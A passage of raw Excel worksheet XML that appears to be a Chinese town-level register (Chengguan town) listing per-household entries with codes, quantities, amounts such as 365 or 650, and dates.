      <c r="D1084" s="24" t="s">
        <v>2902</v>
      </c>
      <c r="E1084" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F1084" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1084" s="24">
        <v>1</v>
      </c>
      <c r="H1084" s="25">
        <v>365</v>
      </c>
      <c r="I1084" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1084" s="24">
        <v>45292</v>
      </c>
      <c r="K1084" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1085" customHeight="1" spans="1:11">
      <c r="A1085" s="23" t="s">
        <v>2903</v>
      </c>
      <c r="B1085" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1085" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1085" s="24" t="s">
        <v>2904</v>
      </c>
      <c r="E1085" s="24" t="s">
        <v>677</v>
      </c>
      <c r="F1085" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1085" s="24">
        <v>1</v>
      </c>
      <c r="H1085" s="25">
        <v>365</v>
      </c>
      <c r="I1085" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1085" s="24">
        <v>45292</v>
      </c>
      <c r="K1085" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1086" customHeight="1" spans="1:11">
      <c r="A1086" s="23" t="s">
        <v>2905</v>
      </c>
      <c r="B1086" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1086" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1086" s="24" t="s">
        <v>2906</v>
      </c>
      <c r="E1086" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F1086" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1086" s="24">
        <v>2</v>
      </c>
      <c r="H1086" s="25">
        <v>325</v>
      </c>
      <c r="I1086" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1086" s="24">
        <v>45292</v>
      </c>
      <c r="K1086" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1087" customHeight="1" spans="1:11">
      <c r="A1087" s="23" t="s">
        <v>2907</v>
      </c>
      <c r="B1087" s="24" t="str">
        <f>B1086</f>
        <v>城关镇</v>
      </c>
      <c r="C1087" s="24" t="str">
        <f>C1086</f>
        <v>中华社区</v>
      </c>
      <c r="D1087" s="42" t="s">
        <v>2908</v>
      </c>
      <c r="E1087" s="42" t="s">
        <v>519</v>
      </c>
      <c r="F1087" s="24">
        <f>F1086</f>
        <v>4113210108</v>
      </c>
      <c r="G1087" s="24"/>
      <c r="H1087" s="24"/>
      <c r="I1087" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1087" s="24"/>
      <c r="K1087" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1088" customHeight="1" spans="1:11">
      <c r="A1088" s="23" t="s">
        <v>2909</v>
      </c>
      <c r="B1088" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1088" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1088" s="24" t="s">
        <v>2910</v>
      </c>
      <c r="E1088" s="24" t="s">
        <v>2911</v>
      </c>
      <c r="F1088" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1088" s="24">
        <v>1</v>
      </c>
      <c r="H1088" s="25">
        <v>365</v>
      </c>
      <c r="I1088" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1088" s="24">
        <v>45292</v>
      </c>
      <c r="K1088" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1089" customHeight="1" spans="1:11">
      <c r="A1089" s="23" t="s">
        <v>2912</v>
      </c>
      <c r="B1089" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1089" s="24" t="s">
        <v>2913</v>
      </c>
      <c r="D1089" s="24" t="s">
        <v>2914</v>
      </c>
      <c r="E1089" s="24" t="s">
        <v>2915</v>
      </c>
      <c r="F1089" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1089" s="24">
        <v>1</v>
      </c>
      <c r="H1089" s="25">
        <v>365</v>
      </c>
      <c r="I1089" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1089" s="24">
        <v>45352</v>
      </c>
      <c r="K1089" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1090" customHeight="1" spans="1:11">
      <c r="A1090" s="23" t="s">
        <v>2916</v>
      </c>
      <c r="B1090" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1090" s="24" t="s">
        <v>2832</v>
      </c>
      <c r="D1090" s="24" t="s">
        <v>2917</v>
      </c>
      <c r="E1090" s="24" t="s">
        <v>2918</v>
      </c>
      <c r="F1090" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1090" s="24">
        <v>1</v>
      </c>
      <c r="H1090" s="25">
        <v>365</v>
      </c>
      <c r="I1090" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1090" s="24">
        <v>45352</v>
      </c>
      <c r="K1090" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1091" customHeight="1" spans="1:11">
      <c r="A1091" s="23" t="s">
        <v>2919</v>
      </c>
      <c r="B1091" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1091" s="24" t="s">
        <v>2920</v>
      </c>
      <c r="D1091" s="24" t="s">
        <v>2921</v>
      </c>
      <c r="E1091" s="24" t="s">
        <v>575</v>
      </c>
      <c r="F1091" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1091" s="24">
        <v>1</v>
      </c>
      <c r="H1091" s="25">
        <v>365</v>
      </c>
      <c r="I1091" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1091" s="24">
        <v>45352</v>
      </c>
      <c r="K1091" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1092" customHeight="1" spans="1:11">
      <c r="A1092" s="23" t="s">
        <v>2922</v>
      </c>
      <c r="B1092" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1092" s="24" t="s">
        <v>2923</v>
      </c>
      <c r="D1092" s="24" t="s">
        <v>2924</v>
      </c>
      <c r="E1092" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F1092" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1092" s="24">
        <v>1</v>
      </c>
      <c r="H1092" s="25">
        <v>365</v>
      </c>
      <c r="I1092" s="24">
        <f t="shared" ref="I1092:I1155" si="17">H1092*G1092</f>
        <v>365</v>
      </c>
      <c r="J1092" s="24">
        <v>45352</v>
      </c>
      <c r="K1092" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1093" customHeight="1" spans="1:11">
      <c r="A1093" s="23" t="s">
        <v>2925</v>
      </c>
      <c r="B1093" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1093" s="24" t="s">
        <v>2926</v>
      </c>
      <c r="D1093" s="24" t="s">
        <v>2927</v>
      </c>
      <c r="E1093" s="24" t="s">
        <v>2899</v>
      </c>
      <c r="F1093" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1093" s="24">
        <v>1</v>
      </c>
      <c r="H1093" s="25">
        <v>365</v>
      </c>
      <c r="I1093" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1093" s="24">
        <v>45352</v>
      </c>
      <c r="K1093" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1094" customHeight="1" spans="1:11">
      <c r="A1094" s="23" t="s">
        <v>2928</v>
      </c>
      <c r="B1094" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1094" s="24" t="s">
        <v>2929</v>
      </c>
      <c r="D1094" s="24" t="s">
        <v>2930</v>
      </c>
      <c r="E1094" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F1094" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1094" s="24">
        <v>1</v>
      </c>
      <c r="H1094" s="25">
        <v>365</v>
      </c>
      <c r="I1094" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1094" s="24">
        <v>45352</v>
      </c>
      <c r="K1094" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1095" customHeight="1" spans="1:11">
      <c r="A1095" s="23" t="s">
        <v>2931</v>
      </c>
      <c r="B1095" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1095" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1095" s="24" t="s">
        <v>2932</v>
      </c>
      <c r="E1095" s="24" t="s">
        <v>1480</v>
      </c>
      <c r="F1095" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1095" s="24">
        <v>1</v>
      </c>
      <c r="H1095" s="25">
        <v>365</v>
      </c>
      <c r="I1095" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1095" s="24">
        <v>45352</v>
      </c>
      <c r="K1095" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1096" customHeight="1" spans="1:11">
      <c r="A1096" s="23" t="s">
        <v>2933</v>
      </c>
      <c r="B1096" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1096" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1096" s="24" t="s">
        <v>2934</v>
      </c>
      <c r="E1096" s="24" t="s">
        <v>2935</v>
      </c>
      <c r="F1096" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1096" s="24">
        <v>1</v>
      </c>
      <c r="H1096" s="24">
        <v>500</v>
      </c>
      <c r="I1096" s="24">
        <f t="shared" si="17"/>
        <v>500</v>
      </c>
      <c r="J1096" s="24">
        <v>45261</v>
      </c>
      <c r="K1096" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1097" customHeight="1" spans="1:11">
      <c r="A1097" s="23" t="s">
        <v>2936</v>
      </c>
      <c r="B1097" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1097" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1097" s="24" t="s">
        <v>2937</v>
      </c>
      <c r="E1097" s="24" t="s">
        <v>2938</v>
      </c>
      <c r="F1097" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1097" s="24">
        <v>1</v>
      </c>
      <c r="H1097" s="24">
        <v>500</v>
      </c>
      <c r="I1097" s="24">
        <f t="shared" si="17"/>
        <v>500</v>
      </c>
      <c r="J1097" s="24">
        <v>45261</v>
      </c>
      <c r="K1097" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1098" customHeight="1" spans="1:11">
      <c r="A1098" s="23" t="s">
        <v>2939</v>
      </c>
      <c r="B1098" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1098" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1098" s="24" t="s">
        <v>2940</v>
      </c>
      <c r="E1098" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F1098" s="24">
        <v>4113210107</v>
      </c>
      <c r="G1098" s="24">
        <v>1</v>
      </c>
      <c r="H1098" s="25">
        <v>365</v>
      </c>
      <c r="I1098" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1098" s="24">
        <v>45261</v>
      </c>
      <c r="K1098" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1099" customHeight="1" spans="1:11">
      <c r="A1099" s="23" t="s">
        <v>2941</v>
      </c>
      <c r="B1099" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1099" s="24" t="s">
        <v>2004</v>
      </c>
      <c r="D1099" s="24" t="s">
        <v>2942</v>
      </c>
      <c r="E1099" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F1099" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1099" s="24">
        <v>1</v>
      </c>
      <c r="H1099" s="25">
        <v>365</v>
      </c>
      <c r="I1099" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1099" s="24">
        <v>45323</v>
      </c>
      <c r="K1099" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1100" customHeight="1" spans="1:11">
      <c r="A1100" s="23" t="s">
        <v>2943</v>
      </c>
      <c r="B1100" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1100" s="24" t="s">
        <v>2944</v>
      </c>
      <c r="D1100" s="24" t="s">
        <v>2945</v>
      </c>
      <c r="E1100" s="24" t="s">
        <v>2946</v>
      </c>
      <c r="F1100" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1100" s="24">
        <v>1</v>
      </c>
      <c r="H1100" s="25">
        <v>365</v>
      </c>
      <c r="I1100" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1100" s="24">
        <v>45323</v>
      </c>
      <c r="K1100" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1101" customHeight="1" spans="1:11">
      <c r="A1101" s="23" t="s">
        <v>2947</v>
      </c>
      <c r="B1101" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1101" s="24" t="s">
        <v>2948</v>
      </c>
      <c r="D1101" s="24" t="s">
        <v>2949</v>
      </c>
      <c r="E1101" s="24" t="s">
        <v>2950</v>
      </c>
      <c r="F1101" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G1101" s="24">
        <v>1</v>
      </c>
      <c r="H1101" s="25">
        <v>365</v>
      </c>
      <c r="I1101" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1101" s="24">
        <v>45323</v>
      </c>
      <c r="K1101" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1102" customHeight="1" spans="1:11">
      <c r="A1102" s="23" t="s">
        <v>2951</v>
      </c>
      <c r="B1102" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1102" s="24" t="s">
        <v>2952</v>
      </c>
      <c r="D1102" s="24" t="s">
        <v>2953</v>
      </c>
      <c r="E1102" s="24" t="s">
        <v>2954</v>
      </c>
      <c r="F1102" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1102" s="24">
        <v>1</v>
      </c>
      <c r="H1102" s="25">
        <v>365</v>
      </c>
      <c r="I1102" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1102" s="24">
        <v>45323</v>
      </c>
      <c r="K1102" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1103" customHeight="1" spans="1:11">
      <c r="A1103" s="23" t="s">
        <v>2955</v>
      </c>
      <c r="B1103" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1103" s="24" t="s">
        <v>2956</v>
      </c>
      <c r="D1103" s="24" t="s">
        <v>2156</v>
      </c>
      <c r="E1103" s="24" t="s">
        <v>2957</v>
      </c>
      <c r="F1103" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1103" s="24">
        <v>1</v>
      </c>
      <c r="H1103" s="25">
        <v>365</v>
      </c>
      <c r="I1103" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1103" s="24">
        <v>45383</v>
      </c>
      <c r="K1103" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1104" customHeight="1" spans="1:11">
      <c r="A1104" s="23" t="s">
        <v>2958</v>
      </c>
      <c r="B1104" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1104" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1104" s="24" t="s">
        <v>2959</v>
      </c>
      <c r="E1104" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F1104" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G1104" s="24">
        <v>1</v>
      </c>
      <c r="H1104" s="25">
        <v>365</v>
      </c>
      <c r="I1104" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1104" s="24">
        <v>45383</v>
      </c>
      <c r="K1104" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1105" customHeight="1" spans="1:11">
      <c r="A1105" s="23" t="s">
        <v>2960</v>
      </c>
      <c r="B1105" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1105" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1105" s="24" t="s">
        <v>2961</v>
      </c>
      <c r="E1105" s="24" t="s">
        <v>2962</v>
      </c>
      <c r="F1105" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1105" s="24">
        <v>1</v>
      </c>
      <c r="H1105" s="25">
        <v>365</v>
      </c>
      <c r="I1105" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1105" s="24">
        <v>45383</v>
      </c>
      <c r="K1105" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1106" customHeight="1" spans="1:11">
      <c r="A1106" s="23" t="s">
        <v>2963</v>
      </c>
      <c r="B1106" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1106" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D1106" s="24" t="s">
        <v>2964</v>
      </c>
      <c r="E1106" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F1106" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1106" s="24">
        <v>1</v>
      </c>
      <c r="H1106" s="25">
        <v>365</v>
      </c>
      <c r="I1106" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1106" s="24">
        <v>45200</v>
      </c>
      <c r="K1106" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1107" customHeight="1" spans="1:11">
      <c r="A1107" s="23" t="s">
        <v>2965</v>
      </c>
      <c r="B1107" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1107" s="24" t="s">
        <v>2966</v>
      </c>
      <c r="D1107" s="24" t="s">
        <v>2967</v>
      </c>
      <c r="E1107" s="24" t="s">
        <v>509</v>
      </c>
      <c r="F1107" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1107" s="24">
        <v>1</v>
      </c>
      <c r="H1107" s="25">
        <v>365</v>
      </c>
      <c r="I1107" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1107" s="24">
        <v>45413</v>
      </c>
      <c r="K1107" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1108" customHeight="1" spans="1:11">
      <c r="A1108" s="23" t="s">
        <v>2968</v>
      </c>
      <c r="B1108" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1108" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1108" s="24" t="s">
        <v>2969</v>
      </c>
      <c r="E1108" s="24" t="s">
        <v>337</v>
      </c>
      <c r="F1108" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1108" s="24">
        <v>1</v>
      </c>
      <c r="H1108" s="25">
        <v>365</v>
      </c>
      <c r="I1108" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1108" s="24">
        <v>45444</v>
      </c>
      <c r="K1108" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1109" customHeight="1" spans="1:11">
      <c r="A1109" s="23" t="s">
        <v>2970</v>
      </c>
      <c r="B1109" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1109" s="24" t="s">
        <v>2971</v>
      </c>
      <c r="D1109" s="24" t="s">
        <v>2972</v>
      </c>
      <c r="E1109" s="24" t="s">
        <v>295</v>
      </c>
      <c r="F1109" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1109" s="24">
        <v>1</v>
      </c>
      <c r="H1109" s="25">
        <v>365</v>
      </c>
      <c r="I1109" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1109" s="24">
        <v>45444</v>
      </c>
      <c r="K1109" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1110" customHeight="1" spans="1:11">
      <c r="A1110" s="23" t="s">
        <v>2973</v>
      </c>
      <c r="B1110" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1110" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1110" s="24" t="s">
        <v>2974</v>
      </c>
      <c r="E1110" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F1110" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1110" s="24">
        <v>1</v>
      </c>
      <c r="H1110" s="25">
        <v>365</v>
      </c>
      <c r="I1110" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1110" s="24">
        <v>45444</v>
      </c>
      <c r="K1110" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1111" customHeight="1" spans="1:11">
      <c r="A1111" s="23" t="s">
        <v>2975</v>
      </c>
      <c r="B1111" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1111" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1111" s="24" t="s">
        <v>2976</v>
      </c>
      <c r="E1111" s="24" t="s">
        <v>2977</v>
      </c>
      <c r="F1111" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1111" s="24">
        <v>1</v>
      </c>
      <c r="H1111" s="25">
        <v>365</v>
      </c>
      <c r="I1111" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1111" s="24">
        <v>45444</v>
      </c>
      <c r="K1111" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1112" customHeight="1" spans="1:11">
      <c r="A1112" s="23" t="s">
        <v>2978</v>
      </c>
      <c r="B1112" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1112" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1112" s="24" t="s">
        <v>2979</v>
      </c>
      <c r="E1112" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1112" s="24">
        <v>4113210107</v>
      </c>
      <c r="G1112" s="24">
        <v>1</v>
      </c>
      <c r="H1112" s="25">
        <v>365</v>
      </c>
      <c r="I1112" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1112" s="24">
        <v>45444</v>
      </c>
      <c r="K1112" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1113" customHeight="1" spans="1:11">
      <c r="A1113" s="23" t="s">
        <v>2980</v>
      </c>
      <c r="B1113" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1113" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D1113" s="24" t="s">
        <v>2981</v>
      </c>
      <c r="E1113" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F1113" s="27">
        <v>4113210106</v>
      </c>
      <c r="G1113" s="24">
        <v>1</v>
      </c>
      <c r="H1113" s="25">
        <v>365</v>
      </c>
      <c r="I1113" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1113" s="41">
        <v>45108</v>
      </c>
      <c r="K1113" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1114" customHeight="1" spans="1:11">
      <c r="A1114" s="23" t="s">
        <v>2982</v>
      </c>
      <c r="B1114" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1114" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1114" s="24" t="s">
        <v>2983</v>
      </c>
      <c r="E1114" s="24" t="s">
        <v>2984</v>
      </c>
      <c r="F1114" s="13">
        <v>4113210103</v>
      </c>
      <c r="G1114" s="24">
        <v>1</v>
      </c>
      <c r="H1114" s="25">
        <v>365</v>
      </c>
      <c r="I1114" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1114" s="41">
        <v>45108</v>
      </c>
      <c r="K1114" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1115" customHeight="1" spans="1:11">
      <c r="A1115" s="23" t="s">
        <v>2985</v>
      </c>
      <c r="B1115" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1115" s="27" t="s">
        <v>1674</v>
      </c>
      <c r="D1115" s="27" t="s">
        <v>2986</v>
      </c>
      <c r="E1115" s="43" t="s">
        <v>265</v>
      </c>
      <c r="F1115" s="36">
        <v>4113210102</v>
      </c>
      <c r="G1115" s="24">
        <v>1</v>
      </c>
      <c r="H1115" s="25">
        <v>365</v>
      </c>
      <c r="I1115" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1115" s="41">
        <v>45108</v>
      </c>
      <c r="K1115" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1116" customHeight="1" spans="1:11">
      <c r="A1116" s="23" t="s">
        <v>2987</v>
      </c>
      <c r="B1116" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1116" s="44" t="s">
        <v>2988</v>
      </c>
      <c r="D1116" s="44" t="s">
        <v>2989</v>
      </c>
      <c r="E1116" s="29" t="s">
        <v>2990</v>
      </c>
      <c r="F1116" s="27">
        <v>4113210102</v>
      </c>
      <c r="G1116" s="24">
        <v>1</v>
      </c>
      <c r="H1116" s="25">
        <v>365</v>
      </c>
      <c r="I1116" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1116" s="41">
        <v>45505</v>
      </c>
      <c r="K1116" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1117" customHeight="1" spans="1:11">
      <c r="A1117" s="23" t="s">
        <v>2991</v>
      </c>
      <c r="B1117" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1117" s="27" t="s">
        <v>2051</v>
      </c>
      <c r="D1117" s="27" t="s">
        <v>2992</v>
      </c>
      <c r="E1117" s="43" t="s">
        <v>2993</v>
      </c>
      <c r="F1117" s="27">
        <v>4113210102</v>
      </c>
      <c r="G1117" s="24">
        <v>1</v>
      </c>
      <c r="H1117" s="25">
        <v>365</v>
      </c>
      <c r="I1117" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1117" s="41">
        <v>45505</v>
      </c>
      <c r="K1117" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1118" customHeight="1" spans="1:11">
      <c r="A1118" s="23" t="s">
        <v>2994</v>
      </c>
      <c r="B1118" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1118" s="27" t="s">
        <v>2032</v>
      </c>
      <c r="D1118" s="27" t="s">
        <v>2995</v>
      </c>
      <c r="E1118" s="43" t="s">
        <v>288</v>
      </c>
      <c r="F1118" s="33">
        <v>4113210108</v>
      </c>
      <c r="G1118" s="24">
        <v>1</v>
      </c>
      <c r="H1118" s="25">
        <v>365</v>
      </c>
      <c r="I1118" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1118" s="41">
        <v>45536</v>
      </c>
      <c r="K1118" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1119" customHeight="1" spans="1:11">
      <c r="A1119" s="23" t="s">
        <v>2996</v>
      </c>
      <c r="B1119" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1119" s="27" t="s">
        <v>2901</v>
      </c>
      <c r="D1119" s="27" t="s">
        <v>2997</v>
      </c>
      <c r="E1119" s="43" t="s">
        <v>1257</v>
      </c>
      <c r="F1119" s="33">
        <v>4113210108</v>
      </c>
      <c r="G1119" s="24">
        <v>1</v>
      </c>
      <c r="H1119" s="25">
        <v>365</v>
      </c>
      <c r="I1119" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1119" s="41">
        <v>45536</v>
      </c>
      <c r="K1119" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1120" customHeight="1" spans="1:11">
      <c r="A1120" s="23" t="s">
        <v>2998</v>
      </c>
      <c r="B1120" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1120" s="27" t="s">
        <v>2999</v>
      </c>
      <c r="D1120" s="27" t="s">
        <v>3000</v>
      </c>
      <c r="E1120" s="43" t="s">
        <v>3001</v>
      </c>
      <c r="F1120" s="33">
        <v>4113210108</v>
      </c>
      <c r="G1120" s="24">
        <v>2</v>
      </c>
      <c r="H1120" s="25">
        <v>325</v>
      </c>
      <c r="I1120" s="24">
        <f t="shared" si="17"/>
        <v>650</v>
      </c>
      <c r="J1120" s="41">
        <v>45536</v>
      </c>
      <c r="K1120" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1121" customHeight="1" spans="1:11">
      <c r="A1121" s="23" t="s">
        <v>3002</v>
      </c>
      <c r="B1121" s="24" t="str">
        <f>B1120</f>
        <v>城关镇</v>
      </c>
      <c r="C1121" s="27" t="str">
        <f>C1120</f>
        <v>商务局（中华办理）</v>
      </c>
      <c r="D1121" s="26" t="s">
        <v>3003</v>
      </c>
      <c r="E1121" s="26" t="s">
        <v>1143</v>
      </c>
      <c r="F1121" s="33">
        <f>F1120</f>
        <v>4113210108</v>
      </c>
      <c r="G1121" s="24"/>
      <c r="H1121" s="24"/>
      <c r="I1121" s="24">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="J1121" s="41"/>
      <c r="K1121" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1122" customHeight="1" spans="1:11">
      <c r="A1122" s="23" t="s">
        <v>3004</v>
      </c>
      <c r="B1122" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1122" s="27" t="s">
        <v>2051</v>
      </c>
      <c r="D1122" s="27" t="s">
        <v>3005</v>
      </c>
      <c r="E1122" s="43" t="s">
        <v>331</v>
      </c>
      <c r="F1122" s="33" t="s">
        <v>266</v>
      </c>
      <c r="G1122" s="24">
        <v>1</v>
      </c>
      <c r="H1122" s="25">
        <v>365</v>
      </c>
      <c r="I1122" s="24">
        <f t="shared" si="17"/>
        <v>365</v>
      </c>
      <c r="J1122" s="41">
        <v>45536</v>
      </c>
      <c r="K1122" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1123" customHeight="1" spans="1:11">
      <c r="A1123" s="23" t="s">
        <v>3006</v>
      </c>
      <c r="B1123" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1123" s="27" t="s">
        <v>2051</v>
      </c>
      <c r="D1123" s="27" t="s">
        <v>3007</v>
      </c>
